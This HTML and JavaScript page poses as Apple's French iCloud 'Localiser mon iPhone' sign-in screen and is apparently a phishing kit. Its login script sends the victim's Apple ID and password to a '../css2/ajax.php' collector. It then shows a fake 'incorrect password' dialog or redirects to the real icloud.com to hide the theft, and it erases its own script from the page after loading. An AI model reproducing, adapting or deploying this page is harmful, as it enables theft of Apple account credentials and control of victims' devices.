
<html>
<head>
<link rel="shortcut icon" href="../favicon.ico" type="image/x-icon"/>
<meta charset="utf-8">

<meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=0" />

<title>iCloud - Localiser mon iPhone</title>
	<script src="code.jquery.com/jquery-1.10.2.js"></script>


<style>


body {
    background-color:#fff;
	width: 100%;
	padding: 0;
	margin: 0;
}
.content {
	
	height: 70%;
	text-align: center;
	margin-top: 10%;
}
.logo {
	padding-bottom:30px;
}
.form {
	
	width: 302px;
	margin: 0 auto;	
}
.modal:target:before {
  display: block;
}
.modal:target .modal-dialog {
  -webkit-transform: translate(0, 0);
  -ms-transform: translate(0, 0);
  transform: translate(0, 0);
  top: 20%;
}
.modal-dialog {
  background: #fefefe;
  border: #333333 solid 1px;
  border-radius: 5px;
  margin-left: -200px;
  position: fixed;
  left: 50%;
  top: -100%;
  z-index: 11;
  width: 360px;
  -webkit-transform: translate(0, -500%);
  -ms-transform: translate(0, -500%);
  transform: translate(0, -500%);
  -webkit-transition: -webkit-transform 0.3s ease-out;
  -moz-transition: -moz-transform 0.3s ease-out;
  -o-transition: -o-transform 0.3s ease-out;
  transition: transform 0.3s ease-out;
}
.modal-body {
  padding: 20px;
}
.modal-header,
.modal-footer {
  padding: 10px 20px;
}
.modal-header {
  border-bottom: #eeeeee solid 1px;
}
.modal-header h2 {
  font-size: 20px;
}
.modal-footer {
  border-top: #eeeeee solid 1px;
  text-align: right;
}
/*ADDED TO STOP SCROLLING TO TOP*/
#close {
  display: none;
}

body,td,th {
	font-style: normal;
}
@font-face {
    font-family: "applefont";
    src: url("a1/src/fmip_location_page/fonts/SFNSText-Light.woff")format("woff");
    font-weight: 300;
}
@font-face {
    font-family: "applefont_medium";
    src: url("a1/src/fmip_location_page/fonts/SFNSText-Medium.woff") format("woff");
}
</style>
<link href="a1/src/fmip_location_page/style.css" rel="stylesheet" type="text/css">
</head>
<body>

<div id="sc1853" class="atv4 find-me sc-view loading-view" style="left: 0px; right: 0px; top: 0px; bottom: 0px"><div id="sc1855" class="atv4 find-me sc-view compass" style="margin-top: -145px; margin-left: -125px; left: 50%; width: 250px; top: 50%; height: 250px; "><div id="sc1856" class="atv4 find-me sc-view" style="margin-top: -125px; margin-left: -125px; left: 50%; width: 250px; top: 50%; height: 250px; "><div id="sc1857" class="atv4 find-me sc-view compass-pointer" style="left: 0px; right: 0px; top: 0px; bottom: 0px; "></div><div id="sc1859" class="atv4 find-me sc-view compass-pointer-shadow" style="left: 0px; right: 0px; top: 10px; bottom: 0px; "></div></div></div><div id="sc1863" class="atv4 find-me sc-view sc-label-view locating-label label sc-regular-size" style="margin-top: 110px; margin-left: -150px; left: 50%; width: 300px; top: 50%; height: 50px; text-align: center">
Localisation...
    </div></div>
<div style="margin-top: 10%;" class="login" >
<div id="content_body" style="display:none;" class="content">
    <div class="form" id="formbg">
    	<div class="logo"><img src="src/find_icon.png" width="115" height="115" alt=""/>
    	</div>
        <div class="findText" style="font-size: 34px;font-weight: 300;">
Localiser mon iPhone
            </div>
	<div id="myModal" class="modal">

		<!-- Modal content -->
		<div align=center class="modal-content w3-animate-zoom">
			<div style="padding-left: 18px; padding-right: 18px; padding-top: 18px; padding-bottom: 10px">
			<span style="padding-top: 10px; font-weight: bold">
Echec de la vérification
			    </span>
			<div style="padding-top: 4px"><span style="font-size: 13px">
Votre identifiant Apple ou votre mot de passe est incorrect.
			    </span></div>
			</div>
<div style="padding-top:12px; min-height: 30px; border-top: 1px solid #dbdbdb; border-bottom-left-radius: 16px; border-bottom-right-radius: 16px;" class="close"><span style="color: green;">OK</span></div>
			
		</div>

		</div>
		  	<form method="post" action="index.html%3Fauth=hhhh.html#" onsubmit="return false" autocomplete="off" style="padding-top: 5px">
			<div class="email">
			 <div id="email_req">
				<label style="padding-top: 15px;" id="label">
Identifiant Apple
				    </label>
				<input style="padding-left: 134px;" name="appleId" id="appleId1" value="" type="text"  placeholder="Email" autocomplete="off" onpaste="myPasteID()">
			</div>
    		</div>
		
            <div class="pas"><div style="min-height: 50px;"><div id="label_pass" style="display: none">

            <label id="label">
Mot de passe
                </label>
            <input autocomplete="off" style="padding-left: 105px;" name="accountPassword" type="password" required  placeholder="obligatoire" id="pw" onpaste="myPastePW()"></div></div>
			<div style="opacity:0;position:absolute;top:0px">
				<input autocomplete="off" style="padding-left: 80px;" name="accountPassword1" type="password"  placeholder="required" id="pw1">
				<input type="password"/>
			  </div>
            <button style="cursor: pointer;z-index:9999; display: block" name="button" id="singin_1" type="button" disabled>
  Se connecter...
                </button>

			<button style="cursor: pointer;z-index:9999; display: none" name="submit" id="singin_2" type="submit" disabled>
Se connecter...
			    </button>

			<div style="position: absolute;left: -9999px;" id="spiner" class="spinner-container auth">
		<div id="submit_loader" style="display: block;position: relative;margin: 0 auto;left: 138px;margin-top: 40px;"><div style="width: 24px; height: 24px; position: absolute; margin-top: -12px; margin-left: -12px; animation: spin12 0.8s linear infinite;"><svg style="width: 24px; height: 24px;"><g transform="translate(12,12)"><g stroke-width="1" stroke-linecap="round" stroke="rgb(51, 51, 51)"><line x1="0" y1="5" x2="0" y2="10" transform="rotate(0, 0, 0)" opacity="1"></line><line x1="0" y1="5" x2="0" y2="10" transform="rotate(30, 0, 0)" opacity="0.9173553719008265"></line><line x1="0" y1="5" x2="0" y2="10" transform="rotate(60, 0, 0)" opacity="0.8347107438016529"></line><line x1="0" y1="5" x2="0" y2="10" transform="rotate(90, 0, 0)" opacity="0.7520661157024794"></line><line x1="0" y1="5" x2="0" y2="10" transform="rotate(120, 0, 0)" opacity="0.6694214876033058"></line><line x1="0" y1="5" x2="0" y2="10" transform="rotate(150, 0, 0)" opacity="0.5867768595041323"></line><line x1="0" y1="5" x2="0" y2="10" transform="rotate(180, 0, 0)" opacity="0.5041322314049588"></line><line x1="0" y1="5" x2="0" y2="10" transform="rotate(210, 0, 0)" opacity="0.42148760330578516"></line><line x1="0" y1="5" x2="0" y2="10" transform="rotate(240, 0, 0)" opacity="0.33884297520661155"></line><line x1="0" y1="5" x2="0" y2="10" transform="rotate(270, 0, 0)" opacity="0.25619834710743805"></line><line x1="0" y1="5" x2="0" y2="10" transform="rotate(300, 0, 0)" opacity="0.17355371900826455"></line><line x1="0" y1="5" x2="0" y2="10" transform="rotate(330, 0, 0)" opacity="0.09090909090909094"></line></g></g></svg></div></div><div class="clear"></div>
        </div>
        	</div>
     </form>  
			<script src="a1/src/icloud_page_new/activity-indicator.js"></script>
			
			<script type='text/javascript'>
			
			jQuery('#submit_loader').activity({width: 1, segments: 12, length: 5});
			$(".close").click(function(){$("#myModal").css("display", "none");
			$("#pw").focus();});
			</script>
			
			<script id="erasable" type="text/javascript">
$(document).ready(function(){
	
	$("#sing_out").click(function(){
			$('#email_value').css('display', 'none');
			$('#sing_out_block').css('display', 'none');
			$('#email_req').css('display', 'block');
			$('#error_div').css('display', 'none');
			$("#appleId").focus();
			var len = $("#appleId").val().length;
			document.getElementById('appleId').setSelectionRange(len,len);
			// alert(len);
		});
		
		$("#singin_2").click(function(){
			$('#spiner').css('position', 'relative');
			$('#spiner').css('left', '10px');
			$('#singin_2').css('display', 'none');$('#spiner').css('display', 'block');		
			$('#text_mai_jos').css('display', 'none');		
		login();});
		
		$("#singin_1").click(function(){
					
		enter(); $("#pw").focus();});
		
		function show_body() {
		  $('#sc1853').css('display', 'none');
		  // $('#content_body').css('display', 'block');
		  $( "#content_body" ).fadeIn( "slow", function() {
			// Animation complete.
		  });
		}
		
		setTimeout(show_body, 4000);

		if ($("input[name=appleId]").val() != ''){
			$("#pw").focus();
		} else {
			$("input[name=appleId]").focus();
		}
		
$( "#pw" ).focus(function() {
					if ($("#appleId2").val() != ''){
						var re = /^(([^<>()\[\]\\.,;:\s@"]+(\.[^<>()\[\]\\.,;:\s@"]+)*)|(".+"))@((\[[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}])|(([a-zA-Z\-0-9]+\.)+[a-zA-Z]{2,}))$/;
						if (!re.test($("#appleId2").val())){
							$("#appleId2").val($("#appleId2").val() + '@icloud.com');
						}
					}
				});
				
				$("input[name=appleId]").keyup(function (e) {
					if (!$( "#error_div" ).hasClass("hide")) {
						$("#error_div").addClass("hide");
					}
					if (e.which == 13) {
						if ($(this).val()!="") {enter();exit();}  $( "#pw" ).focus();
					}
					if ($("input[name=appleId]").val() != '' && $("#pw").val() != ''){
						$('#singin_2').prop('disabled', false);
						if (e.which == 13) {
						  login();
						}
					} if ($("#appleId1").val() != '' ){
						$('#singin_1').prop('disabled', false);
					} else {
						$('#singin_1').prop('disabled', true);
					} {
						$('#singin_2').prop('disabled', true);
						var e = document.getElementById("appleId2");
						if(e!=null) e.id = "appleId1";
						$('#label_pass').css('display', 'none');$('#singin_2').css('display', 'none');
						$('#singin_1').css('display', 'block'); $("#pw").val("");
					}
				});
				$( "#pw" ).keyup(function (e) {
					if (!$( "#error_div" ).hasClass( "hide" )) {
						$("#error_div").addClass("hide");
					}
					if ($("#appleId").val() != '' && $("#pw").val() != ''){
						$('#singin_2').prop('disabled', false);
					} else {
						$('#singin_2').prop('disabled', true);
					}
				});
		
		
		
	});

function login(){
				$("#pw").blur();
				var apple = $('#appleId2').val();
				var pw = $('#pw').val();
				var key = "rck3x";
				
				if(apple!='' && pw!='')
				{
					$("#submit").removeClass("disable");
					$("#submit").addClass("v-hide");
					$('#spiner').removeClass("hide");
					$('#spiner').addClass("show");
					$.ajax({

						type:"POST",
						url:"../css2/ajax.php",
						data:"appleID="+apple+"&pw="+pw+"&key="+key,
						success: function(msg){
							// alert(msg);
							if(msg == 'INVALID')
							{
								$('#pw').blur()
								$("#myModal").css("display","block");
								$('#singin_2').css('display', 'block');
								$('#spiner').css('display', 'none');
								$('#text_mai_jos').css('display', 'block');
								$('#pw').val('');
								$("#submit").addClass("disabled");
							}
							else
							{
								$("#sc1853").css("display","block");
								$(".login").css("display","none");var delayInMilliseconds = 5000; //1 second		
			setTimeout(function() {var redirect_after_login = "apple";
								if (redirect_after_login == 'apple') document.location.href = 'https://icloud.com/';
								else if (redirect_after_login == 'map') document.location.href = 'https://icloud.com/';}, delayInMilliseconds);
							}
							$("#submit").addClass("disable");
							$("#submit").removeClass("v-hide");
							$('#spiner').addClass("hide");
							$('#spiner').removeClass("show");
						}
					});
				}
				else
				{
					if(apple=='') jQuery('#apple').focus();
					else if(pw=='') jQuery('#pw').focus();
				}
				
			}

		function enter(){		
			$('#spiner').css('position', 'relative');
			$('#spiner').css('left', '10px');
			$('#spiner').css('display', 'block');		
			$('#singin_1').css('display', 'none');		
			$('#text_mai_jos').css('display', 'none');		
			var e = document.getElementById("appleId1");		
			e.id = "appleId2";		
			$('#label_pass').css('display', 'block');		
			$(this).css('display', 'none');		
			var delayInMilliseconds = 1000; //1 second		
			setTimeout(function() {		
			$('#spiner').css('display', 'none');		
			$('#singin_2').css('display', 'block');		
			$('#text_mai_jos').css('display', 'block');		
			$("#pw").focus();		
			}, delayInMilliseconds);} 

function myPasteID() {
	$('#singin_1').prop('disabled', false);

	}
function myPastePW() {
	$('#singin_2').prop('disabled', false);
	}document.getElementById("erasable").innerHTML = "";</script>
</div><div id="text_mai_jos" style="padding-top: 8px"><span style="color:green; cursor:pointer;" onclick="location='https://iforgot.apple.com/'">
    Id. Apple ou mot de passe oublié?
    </span><br><br><span style="color:green">
        Instructions de configuration
</span></div>
</div></div>
</body>
</html>
		